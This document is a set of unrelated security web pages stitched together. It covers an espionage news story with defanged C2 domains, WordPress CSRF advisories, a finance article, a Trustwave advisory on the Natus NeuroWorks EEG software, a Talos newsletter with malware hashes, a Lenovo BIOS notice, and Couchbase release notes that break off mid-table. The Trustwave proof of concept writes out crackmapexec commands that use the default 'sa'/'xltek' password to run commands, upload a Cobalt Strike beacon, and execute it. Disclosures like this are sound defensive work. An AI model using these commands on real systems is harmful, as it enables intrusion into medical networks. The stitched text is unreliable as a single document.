Cybersecurity researchers have discovered what they say is malicious cyber activity orchestrated by two prominent Chinese nation-state hacking groups targeting 24 Cambodian government organizations.
"This activity is believed to be part of a long-term espionage campaign," Palo Alto Networks Unit 42 researchers said in a report last week.
"The observed activity aligns with geopolitical goals of

National Security / Cyber Attack

Cybersecurity researchers have discovered what they say is malicious cyber activity orchestrated by two prominent Chinese nation-state hacking groups targeting 24 Cambodian government organizations.

"This activity is believed to be part of a long-term espionage campaign," Palo Alto Networks Unit 42 researchers said in a report last week.

"The observed activity aligns with geopolitical goals of the Chinese government as it seeks to leverage their strong relations with Cambodia to project their power and expand their naval operations in the region."

Targeted organizations include defense, election oversight, human rights, national treasury and finance, commerce, politics, natural resources, and telecommunications.

The assessment stems from the persistent nature of inbound network connections originating from these entities to a China-linked adversarial infrastructure that masquerades as cloud backup and storage services over a "period of several months."

Some of the command-and-control (C2) domain names are listed below -

*   api.infinitycloud\[.\]info
*   connect.infinitycloud\[.\]info
*   connect.infinitybackup\[.\]net
*   file.wonderbackup\[.\]com
*   login.wonderbackup\[.\]com
*   update.wonderbackup\[.\]com

The tactic is likely an attempt on the part of the attackers to fly under the radar and blend in with legitimate network traffic.

What's more, the links to China are based on the fact that the threat actor's activity has been observed primarily during regular business hours in China, with a drop recorded in late September and early October 2023, coinciding with the Golden Week national holidays, before resuming to regular levels on October 9.

China-nexus hacking groups such as Emissary Panda, Gelsemium, Granite Typhoon, Mustang Panda, RedHotel, ToddyCat, and UNC4191 have launched an array of espionage campaigns targeting public- and private sectors across Asia in recent months.

Last month, Elastic Security Labs detailed an intrusion set codenamed REF5961 that was found leveraging custom backdoors such as EAGERBEE, RUDEBIRD, DOWNTOWN, and BLOODALCHEMY in its attacks directed against the Association of Southeast Asian Nations (ASEAN) countries.

The malware families "were discovered to be co-residents with a previously reported intrusion set, REF2924," the latter of which is assessed to be a China-aligned group owing to its use of ShadowPad and tactical overlaps with Winnti and ChamelGang.

The disclosures also follow a report from Recorded Future highlighting the shift in Chinese cyber espionage activity, describing it as more mature and coordinated, and with a strong focus on exploiting known and zero-day flaws in public-facing email servers, security, and network appliances.

Since the beginning of 2021, Chinese state-sponsored groups have been attributed to the exploitation of 23 zero-day vulnerabilities, including those identified in Microsoft Exchange Server, Solarwinds Serv-U, Sophos Firewall, Fortinet FortiOS, Barracuda Email Security Gateway, and Atlassian Confluence Data Center and Server.

The state-sponsored cyber operations have evolved "from broad intellectual property theft to a more targeted approach supporting specific strategic, economic, and geopolitical goals, such as those related to the Belt and Road Initiative and critical technologies," the company said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Hackers Launch Covert Espionage Attacks on 24 Cambodian Organizations

Cross-Site Request Forgery (CSRF) vulnerability in Stranger Studios Force First and Last Name as Display Name plugin <= 1.2 versions.

**Solution**

 Fixed

Update the WordPress Force First and Last Name as Display Name plugin to the latest available version (at least 1.2.1).

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Force First and Last Name as Display Name Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 1.2.1.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-28419: WordPress Force First and Last Name as Display Name plugin <= 1.2 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Enhanced Plugin Admin plugin <= 1.16 versions.

**Solution**

 Fixed

Update the WordPress Enhanced Plugin Admin plugin to the latest available version (at least 1.17).

Found this useful? Thank Yuki Haruma for reporting this vulnerability. Buy a coffee ☕

Yuki Haruma discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Enhanced Plugin Admin Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has been fixed in version 1.17.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-28618: WordPress Enhanced Plugin Admin plugin <= 1.16 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

By Owais Sultan
In the ever-evolving landscape of financial markets, the US Tech 100 Index, represented by the Nasdaq 100, emerges…
This is a post from HackRead.com Read the original post: Navigating Interconnections: Correlations Between the US Tech 100 Index and Major Indices

In the ever-evolving landscape of financial markets, the US Tech 100 Index, represented by the **Nasdaq 100**, emerges as a guiding star for investors seeking exposure to the dynamic technology sector. Yet, to truly harness the potential of this index, one must unravel the intricate web of correlations it shares with other major indices, particularly the S&P 500 and the Dow Jones Industrial Average (DJIA). 

****The Dance of Titans: Nasdaq 100 and S&P 500****

At the heart of this financial ballet lies the dance between the Nasdaq 100 and the S&P 500, two giants that sway to market trends. The correlation between these indices is palpable, a result of shared constituents that bridge the worlds of technology and diverse sectors. Companies like Apple, Microsoft, and Amazon, pivotal players in the Nasdaq 100, also wield influence in the S&P 500, creating a synchronized ebb and flow in their movements.

Historical market data unveils a narrative of tandem strides during pivotal moments. Whether it be the exuberance of bull markets or the caution of bear markets, the **US Tech 100** and S&P 500 often move harmoniously, echoing sentiments reverberating across the broader market landscape. This interconnectedness underscores the need for strategic portfolio construction, as high correlations between these indices demand a nuanced approach to diversification.

****Harmony and Discord: Nasdaq 100 and DJIA****

Yet, as we get deeper into the financial symphony, we encounter a more complex melody in the relationship between the Nasdaq 100 and the DJIA. With its 30 blue-chip constituents, the Dow brings a different timbre to the ensemble. Its diversified composition, spanning various sectors, introduces nuances to the correlation game.

During economic expansions, the Nasdaq 100 may take center stage, propelled by the **surging performance of technology stocks**. However, with its broader representation, the DJIA might follow a different rhythm, reflecting a more measured response to economic cycles. The result is a correlation that dances to a subtler tune, highlighting the interplay of diverse market forces.

****Strategies in the Symphony: Navigating Correlations****

In this financial symphony, traders and investors become conductors, orchestrating strategies that leverage the interconnections between indices. Portfolio diversification becomes an art, with an awareness that high correlations between the Nasdaq 100 and S&P 500 necessitate a thoughtful selection of assets to achieve true diversification.

Strategic diversification emerges as a key motif. By introducing assets with lower correlations, such as commodities or international equities, investors can fine-tune their portfolios to harmonize with the dynamic rhythms of the market. It’s a strategic dance, adapting to the ever-changing correlations that define the contemporary financial landscape.

Yet, in this intricate ballet, the one constant is change. Economic variables, global events, and the individual movements of stocks all play their part in reshaping correlations. Traders and investors must remain vigilant, adapting their strategies to the evolving dynamics of the market.

1.  The 10 Best Cybersecurity Companies in the UK
2.  Dow Jones’ screening watchlist data exposed online
3.  10 Top DDoS Attack Protection and Mitigation Companies in 2023
4.  Can ordinary companies keep up with data compliance regulations?
5.  3 of 5 Fortune 500 companies vulnerable due to ManageEngine flaws

Navigating Interconnections: Correlations Between the US Tech 100 Index and Major Indices

Natus NeuroWorks and SleepWorks before 8.4 GMA3 utilize a default password of xltek for the Microsoft SQL Server service sa account, allowing a threat actor to perform remote code execution, data exfiltration, or other nefarious actions such as tampering with data or destroying/disrupting MSSQL services.

Trustwave SpiderLabs Security Advisory TWSL2023-006: Default MSSQL Database Password in Natus NeuroWorks EEG Software Published: 11/07/2023 Version: 1.0 Vendor: Natus https://natus.com/products-services/natus-neuroworks-eeg-software Product: NeuroWorks EEG Software Version affected: Prior to 8.4 GMA3 Product description: The Natus NeuroWorks platform simplifies the process of collecting, monitoring, trending and managing data for routine EEG testing, ambulatory EEG, long-term monitoring, ICU monitoring, and research studies. NeuroWorks systems are scalable to meet the needs of private practice clinics, hospitals, large teaching facilities and EEG service providers. Natus NeuroWorks is a cutting-edge, single solution for EEG, LTM, ICU, Sleep, and Research Studies, exhibiting an advanced software for clinical excellence. The Microsoft SQL-based NeuroWorks database is a powerful tool that simplifies the management of patient, study and laboratory data. Filter studies by date, status, diagnosis, or use any built-in editable field to create custom filters for your unique needs. Track outcomes and filter by statistical indices that are calculated in the reports. The distributed database automatically updates system settings across the network to ensure that all workstations have current lab settings. Finding 1: Default Password for Natus NeuroWorks EEG Software MSSQL Database \*\*\*\*\*Credit: John Jackson of Trustwave Natus NeuroWorks EEG Software utilizes their own custom MSSQL configuration and database for the management of medical research studies connected to the testing and monitoring software implemented via the Natus NeuroWorks platform. By default, the MSSQL service utilizes the administrative username 'sa' coupled with the password 'xltek'. An attacker can utilize the default credentials to access stored sensitive data or perform administrative functions and MSSQL queries. In addition, an attacker on the local network could potentionally leverage the credentials to access the file system of the server and perform read, write, and execution functions on the disk. Natus recommends against changing the default password as it will disable MigrateDB's ability to authenticate silently in instances of new virtual database creation. Proof of Concept/Summary: While the instance of default credentials is properly documented within the "XL Security Site Administrator Reference" guide, Natus specifically recommends against changing the default credentials. The document specifically states: "Each instance of SQL Server also has a system administrator username ('sa'). The default password is 'xltek'; however it can be changed for each instance of SQL Server. We strongly recommend using the default password for local SQL Server instances". Natus recommends against changing the password, because of their MigrateDB function. The document goes on to say: "MigrateDB is also called silently when a new 'virtual database' is created through Natus Database - XLDB. In this case, MigrateDB will not prompt the user for the 'sa' password. If the password for 'sa' has been altered on the local machine from its default, the creation of a new virtual server will fail". They do however recommend a workaround, which is to change the password back to xltek while performing new virtual database creation, and then once again change back to the default. ## Running the command 'whoami' using default credentials └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'whoami' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME nt authority\\network service ## Writing a cobalt strike beacon to a local windows directory └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth --put-file /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe C:\\\\Temp\\\\Events\\\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Copy /home/mrhacking/Desktop/cobaltstrike/payloads/armsvc.exe to C:\\Temp\\Events\\armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Size is 409088 bytes MSSQL SERVERNAME 1433 SERVERNAME \[+\] File has been uploaded on the remote machine └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'dir C:\\Temp\\Events\\' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME -------------------------------------------------------------------------------- MSSQL SERVERNAME 1433 SERVERNAME Volume in drive C is Windows MSSQL SERVERNAME 1433 SERVERNAME Volume Serial Number is A050-B8DA MSSQL SERVERNAME 1433 SERVERNAME Directory of C:\\Temp\\Events MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

. MSSQL SERVERNAME 1433 SERVERNAME 06/15/2023 02:54 PM

.. MSSQL SERVERNAME 1433 SERVERNAME 06/23/2023 02:31 PM 409,088 armsvc.exe MSSQL SERVERNAME 1433 SERVERNAME 1 File(s) 409,088 bytes MSSQL SERVERNAME 1433 SERVERNAME 2 Dir(s) 34,903,302,144 bytes free ## Triggering the cobalt strike beacon └─$ crackmapexec mssql SERVERNAME -u 'sa' -p 'xltek' --local-auth -x 'cmd.exe /c start C:\\Temp\\Events\\armsvc.exe' MSSQL SERVERNAME 1433 SERVERNAME \[\*\] Windows 10.0 Build 14393 (name:SERVERNAME) (domain:SERVERNAME) MSSQL SERVERNAME 1433 SERVERNAME \[-\] SERVERNAME\\sa:xltek table users has no column named pillaged\_from\_computerid MSSQL SERVERNAME 1433 SERVERNAME \[+\] Executed command via mssqlexec MSSQL SERVERNAME 1433 SERVERNAME None ## Beacon command execution proof beacon> sleep 0 \[\*\] Tasked beacon to become interactive \[+\] host called home, sent: 16 bytes beacon> getuid \[\*\] Tasked beacon to get userid \[+\] host called home, sent: 8 bytes \[\*\] You are NT AUTHORITY\\NETWORK SERVICE beacon> run systeminfo \[\*\] Tasked beacon to run: systeminfo \[+\] host called home, sent: 28 bytes \[+\] received output: Host Name: SERVERNAME OS Name: Microsoft Windows 10 Enterprise 2016 LTSB OS Version: 10.0.14393 N/A Build 14393 OS Manufacturer: Microsoft Corporation OS Configuration: Member Workstation OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: XXXXX-XXXXX-XXXXX-XXXXX Original Install Date: 6/6/2017, 5:39:30 PM System Boot Time: 6/17/2023, 2:07:18 PM System Manufacturer: Dell Inc. System Model: OptiPlex 5050 System Type: x64-based PC Processor(s): 1 Processor(s) Installed. \[01\]: Intel64 Family 6 Model 94 Stepping 3 GenuineIntel ~3312 Mhz BIOS Version: Dell Inc. 1.11.1, 11/29/2018 Windows Directory: C:\\windows System Directory: C:\\windows\\system32 Boot Device: \\Device\\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 8,051 MB Available Physical Memory: 5,344 MB Virtual Memory: Max Size: 16,243 MB Virtual Memory: Available: 13,210 MB Virtual Memory: In Use: 3,033 MB Page File Location(s): C:\\pagefile.sys Domain: REDACTED FOR PRIVACY Logon Server: N/A Hotfix(s): 6 Hotfix(s) Installed. \[01\]: KB4013418 \[02\]: KB4033631 \[03\]: KB4049411 \[04\]: KB4103729 \[05\]: KB4132216 \[06\]: KB4103720 Network Card(s): 1 NIC(s) Installed. \[01\]: Intel(R) Ethernet Connection (5) I219-V Connection Name: LAN DHCP Enabled: Yes DHCP Server: X.X.X.X IP address(es) \[01\]: X.X.X.X Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes Vendor Response: The vendor has revised the Administrator Reference document by discontinuing the endorsement of default password usage. Instead, the vendor strongly recommends that all users change default SQL credentials. This requires to update the software to leverage the Credentials Cache feature, introduced in version 8.4 GMA3. The technical service team will provide the revised documentation to customers on request, and in the future, it will be integrated into the Neuroworks software installation package. The vendor has additionally released a security advisory regarding this threat. You can access the security bulletin at this link: https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf Remediation Steps: Upgrade to GMA3 version 8.4 or a higher version to enable the credential cache feature and update the default SQL credentials. Revision History: 06/27/2023 - Trustwave disclosed vulnerability to vendor 07/07/2023 - Vendor provides Trustwave with preliminary version of the updated documentation 07/18/2023 - Vendor has provided Trustwave with remediation plan 10/20/2023 - Vendor publishes security bulletin 11/07/2023 - Advisory published References 1. https://natus.bynder.com/m/7cd3bcca88e446d4/original/NeuroWorks-SleepWorks-Product-Security-Bulletin.pdf About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

CVE-2023-47800

It can be easy to get caught up in the “big” questions in cybersecurity, like how to stop ransomware globally or keep hospitals up and running when they’re targeted by data theft extortion.

Thursday, November 9, 2023 14:11

I found the juxtaposition of stories on the Talos blog over the past week-plus kind of funny. 

On one hand, we had a massive story about Arid Viper, a Middle Eastern threat actor spreading spyware, one of the most dangerous types of malware out there right now, operating out of Gaza no less. 

Then, we had “Roblox,” a children’s video game (which I’ve written about multiple times and I maintain was the OG metaverse).  

The scale of these attacks is obviously vastly different. Spyware is being used across the globe to monitor some of the most vulnerable activists, journalists and government officials to track their physical movement.  

Meanwhile, “Roblox” players are losing money in a game where the characters look like vague LEGO minifigure knockoffs.  

And the blog homepage is just a perfect encapsulation of how cybersecurity means more than just blocking malware. It can mean teaching your children how to stay safe when they go online, how to properly lock down your login credentials and just being smart at spotting scams. 

But it can also have global implications in areas where there is a global military conflict, just like we’ve written about countless times in Ukraine. 

I would never call one security researcher’s work more “important” than another's — everyone in the security community works extremely hard to keep the internet safe, no matter what company you work for or what your area of expertise is. Tiago from our Outreach team who wrote about the “Roblox” scams has certainly done way more malware research beyond this. But it’s clear that the real-world implications of both these threats are very different. 

For me, the takeaway is just to leave room for all of this. It can be easy to get caught up in the “big” questions in cybersecurity, like how to stop ransomware globally or keep hospitals up and running when they’re targeted by data theft extortion. But that doesn’t mean we can ignore the “small stuff” either because those problems are more likely to end up on our virtual front door. 

If I may continue to plug Talos’ work, we have a new video series launching today, too, under our Threat Spotlight banner. Each month, Decipher reporters and Talos researchers will team up to recap the top stories, malware and threats in the headlines. We’re excited about this new partnership with Decipher.

 **The one big thing **

Attackers are using a new tactic to get spam through their email inbox filters via Google Forms. Google Forms has a “quiz” option for their fields, and adversaries have found a workaround to send the “answers” to a quiz to targets, which are actually spam messages that appear to the user like they’re legitimate messages coming from Google. In one case, we found a deep cryptocurrency-related scam using this method, and other actors are just hoping to get the user to click on a malicious link that could lead to other scams or malware.  

**Why do I care? **

The average user is going to see a message from Google Forms, especially after they just filled out a Form, and assume it’s legitimate, so attackers are more likely to be successful using this method of delivering their spam compared to traditional email methods. Google Forms abuse has been present in spam attacks for several years, though our investigation showed that this particular feature of Google Forms quizzes was not very heavily abused to send spam until relatively recently. 

**So now what? **

As with all types of spam, follow the basic rule, “If it seems too good to be true, it probably is.” While there is no concrete method of blocking these comments and quiz results from coming through, if you’re using Google Forms, be weary of illegitimate messages making their way through. Look for things like misspellings, typos, or URLs that you don’t recognize.  

**Top security headlines of the week **

**A coalition of more than 40 international governments, including the European Union and Interpol, have agreed to not pay ransomware attackers’ extortion payments.** The commitment came from last week's U.S.-led Counter Ransomware Initiative meeting and applies to those countries’ government agencies. Private companies who operate in these nations are most often the targets of ransomware, however, but leaders hope the pledge will influence them to take the same stance. Whether to pay the ransom is often a tough decision for the private sector, which needs to balance the cost of keeping their network operations offline during recovery versus having their files returned as quickly as possible. However, there is never a guarantee that the ransomware actor will provide a decryption key as promised. Government officials hope that cutting off the flow of income to the threat actors will dry up their resources and discourage future attacks. (Axios, Reuters) 

**Atlassian elevated a recently disclosed vulnerability to the maximum severity rating after threat actors started exploiting it to deliver the Cerber ransomware.** CVE-2023-22518 is an improper authorization vulnerability in Confluence Data Center and Server, which first received a patch on Oct. 31. Adversaries can exploit this vulnerability on internet-facing Confluence servers by sending specially devised requests to setup-restore endpoints. Confluence accounts hosted in Atlassian’s cloud environment are not affected, according to the company. In its initial disclosure of CVE-2023-22518, Atlassian warned of “significant data loss if exploited” and said, “customers must take immediate action to protect their instances.” (SC Media, Ars Technica) 

**The Mozi botnet mysteriously has gone offline, and experts are unsure if the original creators are responsible.** Mozi was once a massive network that attackers used to carry out distributed denial-of-service (DDoS) attacks, data exfiltration and payload execution against internet-of-things (IoT) devices. Once one of the largest botnets in the world, it’s now essentially offline, according to security researchers. A kill switch seems to be the root cause, though it’s unclear if the operators did this on their own volition if they had their hand forced by law enforcement, or if another third party was involved. The kill switch code shares some code snippets with the original botnet, and whoever deployed it used the correct private keys to sign the payload. Botnets tend to still come back to life after reported takedowns, so there is no guarantee that Mozi is gone forever. (Dark Reading, The Register) 

**Can’t get enough Talos? **

*   Threat Roundup for Oct. 27 - Nov. 3 
*   Talos Takes Ep. #161 (XL Edition): The top incident response trends of Q3 
*   Cisco Talos researcher Nick Biasini on chasing APTs, mercenary hackers 
*   Cyber attackers are increasingly targeting web applications 

**Upcoming events where you can find Talos **

**Black Hat Middle East and Africa** **(Nov. 16)** 

_Riyadh, Saudi Arabia_ 

> _Rami Atalhi from Talos Incident Response will discuss how generative AI affects red and blue teams in cybersecurity. Discover how generative AI creates a bridge between these teams, fostering teamwork and innovative strategies. Real-world cases will demonstrate how generative AI drives success, providing insights for building resilient cybersecurity plans._ 

**misecCON** **(Nov. 17)** 

_Lansing, Michigan_ 

> _Terryn Valikodath from Talos Incident Response will deliver a talk providing advice on the best ways to conduct analysis, learning from his years of experience (and mishaps). He will speak about the everyday tasks he and his Talos IR teammates must go through to properly perform analysis. This talk covers topics such as planning, finding evil, recording findings, correlation and creating your own timelines._ 

**"Power of the Platform” by Cisco** **(Dec. 5 & 7)** 

_Virtual (Please note: This presentation will only be given in German)_ 

> _The annual IT event at the end of the year where Cisco experts, including Gergana Karadzhova-Dangela from Cisco Talos Incident Response, discuss the future-oriented topics in the implementation of digitalization together with you._  

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a   
**MD5:** 200206279107f4a2bb1832e3fcd7d64c   
**Typical Filename:** lsgkozfm.bat   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd 

**SHA 256:** 8664e2f59077c58ac12e747da09d2810fd5ca611f56c0c900578bf750cab56b7    
**MD5:** 0e4c49327e3be816022a233f844a5731    
**Typical Filename:** aact.exe    
**Claimed Product:** AAct x86    
**Detection Name:** PUA.Win.Tool.Kmsauto::in03.talos 

**SHA 256: 5e537dee6d7478cba56ebbcc7a695cae2609010a897d766ff578a4260c2ac9cf**   
**MD5:** 2cfc15cb15acc1ff2b2da65c790d7551   
**Typical Filename:** rcx4d83.tmp   
**Claimed Product:** N/A     
**Detection Name:** Win.Dropper.Pykspa::tpd 

**SHA 256:** 975517668a3fe020f1dbb1caafde7180fd9216dcbf0ea147675ec287287f86aa   
**MD5:** 9403425a34e0c78a919681a09e5c16da   
**Typical Filename:** vincpsarzh.exe   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::tpd

A new video series, Google Forms spam and the various gray areas of cyber attacks

A vulnerability was reported in some ThinkPad BIOS that could allow a physical or local attacker with elevated privileges to tamper with BIOS firmware.

**About Lenovo**

*   Our Company
*   News
*   Investor Relations
*   Sustainability
*   Product Compliance
*   Product Security
*   Lenovo Open Source
*   Legal Information
*   Jobs at Lenovo

**Shop**

*   Laptops & Ultrabooks
*   Tablets
*   Desktops & All-in-Ones
*   Workstations
*   Accessories & Software
*   Servers
*   Storage
*   Networking
*   Laptop Deals
*   Outlet

**Support**

*   Drivers & Software
*   How To's
*   Warranty Lookup
*   Parts Lookup
*   Contact Us
*   Repair Status Check
*   Imaging & Security Resources
*   Glossary

**Resources**

*   Where to Buy
*   Shopping Help
*   Track Order Status
*   Product Specifications (PSREF)
*   Forums
*   Registration
*   Product Accessibility
*   Environmental Information
*   Gaming Community
*   LenovoEDU Community
*   LenovoPRO Community

© Lenovo.  
| | | |

CVE-2023-5078: Multi-vendor BIOS Security Vulnerabilities (October 2023) - Lenovo Support US

Couchbase Server 7.1.4 before 7.1.5 and 7.2.0 before 7.2.1 allows Directory Traversal.

Couchbase Server 7.2.1 was released in September 2023.

**New Features**

This release includes the following new features.

**XDCR**

The following XDCR features are new:

*   XDCR replications, specified by means of the REST API, can now use the filterBinary flag. This specifies whether binary documents should be replicated. Detailed information on the filterBinary flag is provided on the REST reference page, Creating a Replication.
    
*   Using the REST API, node-connectivity can now be checked, prior to the creation of an XDCR reference. See Checking Connections.
    
*   In Couchbase Server Version 7.2.1 and later, XDCR provides enhanced information on cluster-rebalance status. See Rebalance Information
    

**Enhancements**

This release includes the following enhancements:

*   Bloom filters for the Indexing Service were not previously enabled by default. Bloom filters are now enabled by default. This change reduces the Index Service disk lookups when there are insert heavy workloads. Bloom filters are used by the index storage layer to reduce the disk i/o and improve the overall efficiency of the index service. You can disable bloom filters and opt out.
    

**Future Reserved Words**

To give you enough time to prepare ahead, we are going to add the following reserved words for features in an upcoming Couchbase Server release:

*   SEQUENCE
    
*   CACHE
    
*   RESTART
    
*   MAXVALUE
    
*   MINVALUE
    
*   NEXT
    
*   PREV
    
*   PREVIOUS
    
*   NEXTVAL
    
*   PREVVAL
    
*   CYCLE
    
*   RECURSIVE
    
*   RESTRICT
    

No action is required for upgrading to Server 7.2.1.

**New Supported Platforms**

This release adds support for the following new platforms:

*   Alma Linux 9
    
*   Rocky Linux 9
    

**Fixed Issues**

This release contains the following fixes.

**Analytics Service**

  

Issue

Description

Resolution

MB-56957

External collections could not be created using Azure Managed Identity.

Azure dependencies have been updated to correct this issue.

MB-57588

Query results could be unnecessarily converted twice to JSON when documents were large.

The Query result is now converted to JSON once for all documents.

MB-57615

When the Prometheus stats returned from Analytics exceeded four kilobytes, the status code was inadvertently set to 500 (Internal Error), and this resulted in a large number of warnings in the Analytics warning log. Couchbase Server discarded these statistics.

This has been fixed to properly return a 200 (OK) status code when the size of Prometheus stats exceeds 4KiB, allowing these stats to be recorded properly. The warning is not displayed.

**Data Service**

  

Issue

Description

Resolution

MB-39344

The last item in a replica checkpoint was not expelled. In scenarios such as large average item size, high numbers of replicas or low Bucket quota could result in a data-node entering an unrecoverable Out-of-Memory state.

ItemExpel has been enhanced to release all the items in a checkpoint when memory conditions allow.

MB-56084

A rollback loop affected legacy clients when collections were used and a tombstone newer than the last mutation in the default collection was purged.

The lastReadSeqno is now Incremented when the client is not collection-aware.

MB-56644

In rare cases, after a failover or memcached restart, a replica rollback while under memory pressure might have caused a crash in the Data Service.

Memory pressure recovery logic (Item expelling) is now skipped when replica rollback is in progress.

MB-56970

XDCR or restore from backup entered an endless loop if attempting to overwrite a document which was deleted or expired some time ago with a deleteWithMeta operation. This was due to a specific unanticipated state in memory which increased CPU usage, and connection became unusable for further operations.

deleteWithMeta is now resilient to temporary non-existent values with xattr datatype.

MB-57002

When using .NET SDK on Windows 10 client and client certs were enabled on CB Server, the Data-Service did not establish a connection and client bootstrap failed with a OpenSSL “session id context uninitialized" error.

Data-Service has been updated to disable TLS session resume.

MB-57064

GET\_META requests for deleted items fetched metadata in memory which was not evicted in value-eviction buckets.

Metadata items are now cleaned when the expiry pager runs.

MB-57106

DCP clients streamed in out-of-sequence-order \[OSO\] backfill snapshots under Magma observed duplicate documents received in the disk snapshot. This happened where the stream was paused and resumed when the resume point was wrongly set to a key already processed in the stream.

OSO backfill in Magma now sets the correct resume point after a pause.

MB-57304

Data Service rebalance duration was significantly impacted if other DCP clients created a large number of Streams, if those streams needed to be read from disk, due to the lack of prioritizing between rebalance and other DCP clients.

The number of backfills each DCP client can perform concurrently has been limited to allow fairer allocation of resources.

MB-57400

The computation count for the items remaining DCP/Checkpoint stats exposed to Prometheus was the O(N) function. Where N is the number of items in a checkpoint. This caused various performance issues including Prometheus stats timeouts when checkpoints accumulated a high number of items.

The computation count has been optimized and now is O(1).

MB-57609

A spurious auto-failover could happen when Magma compaction visited a TTL’d document that was already deleted.

Document not found does not now increment the number of read failures.

**Index Service**

  

Issue

Description

Resolution

MB-56339

During scaling, an GSI indexer rebalance froze and did not successfully complete. This was because an index snapshot was not correctly deleted and recreated.

A flag now handles snapshots to ensure they are correctly deleted or recreated when indexes are updated during rebalancing.

MB-57021

When alter index updated the replica count, new replicas were not built immediately when the original definition was {defer\_build: true}. Existing replicas were built and new replicas were built in the next processing iteration.

New replicas are now built when the replica count is updated for deferred indexes. The status of existing index instances is checked, and if ready, a new build of the instance is triggered.

MB-57777

When the indexer was unable to keep up with KV mutations, and there was a queue of mutations within the indexer, there was a large memory overhead from the bookkeeping of queued up mutations.

Indexer has been improved to optimize memory usage so that the bookkeeping overhead is reduced for queued up mutations.

**Query Service**

  

Issue

Description

Resolution

MB-56533

Due to how nested dependencies were handled, a sudden rise in memory utilization of the query service on a node caused a memory alert issue. The node did not recover correctly following a restart.

Nested dependencies are now handled appropriately in the ADVISE statement.

MB-56563

A query with multiple filters on an index key, one of which was a parameter, could produce incorrect results. This was caused by incorrectly composing the exact index spans to support the query.

The way in which exact spans are set has been modified to correct this issue.

MB-56579

Covering FLATTEN\_KEYS() on an array index generated incorrect results. This was because a modified version of the ANY clause was applied after the index which meant false positives were retained and Distinct scan rows were eliminated.

